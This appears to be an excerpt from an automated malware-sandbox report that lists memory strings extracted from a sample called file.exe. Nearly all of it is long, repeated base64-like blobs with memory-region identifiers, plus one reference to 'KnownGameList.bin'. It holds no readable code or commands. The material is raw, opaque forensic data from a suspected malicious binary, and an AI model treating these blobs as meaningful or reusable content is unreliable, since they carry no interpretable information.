..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
Source: file.exe, 00000003.00000002.603157570.000000000AACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
Source: file.exe, 00000003.00000002.619438910.000000000B992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KNOWNG~1.BINKnownGameList.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
Source: file.exe, 00000003.00000002.632995633.000000000C89C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.613121105.000000000B222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
Source: file.exe, 00000003.00000002.619438910.000000000B992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
Source: file.exe, 00000003.00000002.603157570.000000000AACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 